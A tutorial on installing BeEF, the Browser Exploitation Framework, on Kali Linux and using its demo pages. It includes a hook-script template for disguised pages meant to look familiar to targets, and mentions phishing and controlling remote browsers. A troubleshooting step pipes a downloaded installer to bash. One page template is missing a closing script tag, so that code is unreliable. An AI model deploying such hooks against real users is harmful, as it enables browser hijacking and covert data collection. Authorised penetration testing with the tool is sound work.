There are many tools for hacking and pentesting Kali Linux. We will also mention one of the best of these tools, which is called BeEF. Note that beEF is not installed by default in Kali Linux, but you can find it in the default repository. Use the apt package manager for installing BeEF. You will then see a web interface open on port 3000 to run the tests. Read our article carefully, this article will teach you the best way to install BeEF on Kali Linux and show you all the installation steps.

What Is BeEF on Kali Linux?

BeEF is the short form of “Browser Exploitation Framework” and is an open-source penetration testing tool designed to assess the security of web browsers. This tool is something similar to Metasploit on Kali Linux but focuses on web browsers.

It is primarily used by ethical hackers and security professionals to evaluate the vulnerability of web applications and the security of client-side systems. BeEF allows testers to demonstrate various client-side attacks and assess how well a target system can withstand these attacks. This type of attack works great for social engineering.

What Are the Significant Features of BeEF?

Here, you will find out some key features of BeEF:

• BeEF provides a user-friendly web-based interface that allows penetration testers to control and interact with compromised browsers remotely. The interface makes it easy to manage and monitor compromised targets.
• BeEF can be integrated with social engineering attacks to enhance its effectiveness. It can be used in phishing campaigns to compromise the browsers of unsuspecting users.
• This greater tool emphasizes the importance of client-side attacks, highlighting the risks associated with browser vulnerabilities.
• BeEF comes equipped with a wide range of exploitation modules that can be used to target specific vulnerabilities in web browsers.
• BeEF supports a wide range of web browsers, making it versatile for assessing the security of different browser types, including Chrome, Firefox, Safari, Internet Explorer, and more.
• BeEF provides reporting and logging capabilities, allowing testers to document their findings and generate reports for clients or internal teams.
• BeEF has an active and supportive community of users and contributors.
• BeEF employs a technique known as “hooking” to compromise target browsers.
• BeEF relies on JavaScript injection to compromise target browsers.

How to Install BeEF on Kali Linux?

You can install BeEF manually on your Linux VPS, depending on the Kali Linux version you have. Installing BeEF is straightforward. Here we will introduce you to the steps to install BeEF:

– The first step is updating the repositories info using the command below:

sudo apt update

Tip: If you were notified that upgrades are available, it is recommended to upgrade the system using the command below:

sudo apt upgrade

Installing the BeEF Package on Kali Linux

Now you can start installing BeEF by the following command:

sudo apt install beef-xss

All the required dependencies to use BeEF will automatically added. This action will bring up a web interface but you will need so many additional packages. So keep studying!

How to Start the BeEF Service

As you installed the BeEF service, you can start the related service with this command:

sudo beef-xss

• When you run BeEF for the first time, you may be prompted to set a default user password.
• Any other warnings or errors are also displayed in this section.
• The URL of the web interface will also be given to you. Here is your IP address with port 3000.

Another option is to find BeEF in the main menu:

Now you can use just one click to start or stop the service.

When you start the service, you can access the BeEF web interface at:

http://localhost:3000

Or, to access from another computer, use the following URL:

http://IP:3000

The login process will be like this:

– Your default user name is “beef” and your password is the one you set while starting the service.

– When you have passed all these steps successfully, you will have a web interface. But we will use the demo so that you get to know more about this tool.

Getting Familiar with the Demo Page

BeEF uses demo pages to familiarize you with the working process of this tool, so it is better to pay attention to this section.

The first page of this tool is very simple. It is a text page with the BeEF logo:

Open the following URL in order to access it in your browser:

http://localhost:3000/demos/basic.html

When you open the page, you’ll see a new line under “Online Browsers” that corresponds to the tab you opened on the desktop.
All actions performed on this page are recorded and you can see them in the user interface. Below is a screenshot of the tests as an example:

BeEF can detect if the tab is in focus or not. Or find out, what we have typed in the form or where we have clicked with the mouse. All actions performed are internal and no other code is needed to collect information.

BeEF can collect more general data about the user. These data can be:

• Your device type
• IP address
• The information about the operating system
• Other details about web browser
• etc.

This tool works in such a way that even if the target only opens the page for a second, its information such as network, configuration, and the entire system will be available to you.

Testing the BeEF Service from Another Computer

After testing from Kali Linux, Now we will test the BeEF tool from another computer:

The below screenshot shows that we accessed the page from a Windows computer, IP 192.168.***.**

As you connect the browser to BeEF, you can use the commands available in this tab:

This way, you can control the web browser on the remote computer. In this example, we redirected the browser to a specific URL. You can use many other commands to collect data.

Creating a Custom Page

The important thing is to create better pages that look familiar to the intended target. For example, this page can be the entry page for their main program. If you want to create custom pages in BeEF, you should create HTML pages in this directory:

/usr/share/beef-xss/extensions

There you can see the demo folder we have used before with an HTML subfolder.

To be able to connect this page to beef, just create a traditional HTML page and then add the following Java code in the header:

<script>
 var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';

   document.write(commandModuleStr);
</script>

We used the full code as you can see here. If you desire, you can Copy/paste this code as a template for your new page:

<html>
        <head>
                <title>Test page infosec</title>
                <script>
                var commandModuleStr = '<script src="<%= @hook_uri %>" type="text/javascript"><\/script>';
                document.write(commandModuleStr);
        </head>
        <body>
        </body>

</html>

At last use this command if you want to stop this service:

sudo beef-xss-stop -h

Troubleshooting Some Common Issues of BeEF

Here are some common problems with BeEF on Kali Linux and their solutions:

1- Difficulty installing BeEF on Kali Linux due to missing dependencies or package conflicts.

Solution:

Ensure that your Kali Linux installation is up to date by running sudo apt update and sudo apt upgrade. Install any missing dependencies or packages as specified in the BeEF documentation or error messages.

2- BeEF may not work with the default Ruby version on Kali Linux.

Solution:

Use a Ruby version manager like RVM to install and manage the required Ruby version. BeEF typically works best with Ruby 2.5 or later. You can install RVM and the necessary Ruby version like this:

curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
rvm install 2.7.4
rvm use 2.7.4 --default

3- Database-related errors or connection issues when starting BeEF.

Solution:

Ensure your PostgreSQL or MySQL server is running and properly configured. Update BeEF’s database configuration in the config.yaml file to match your database settings.

4- BeEF may fail to bind to the desired IP address or port.

Solution:

Edit the config.yaml file to specify the correct IP address and port for BeEF to bind to. Ensure that the IP address is reachable and not blocked by firewalls.

Conclusion

BeEF is a Penetration tool that allows you to control and interact with web browsers on remote systems, and can be useful for testing and demonstrating various web vulnerabilities. Here we tried to give you a complete guide to install BeEF on Kali Linux. So follow the steps to have a hassle-free installation process. leave a comment if you encounter any problems. Happy coding!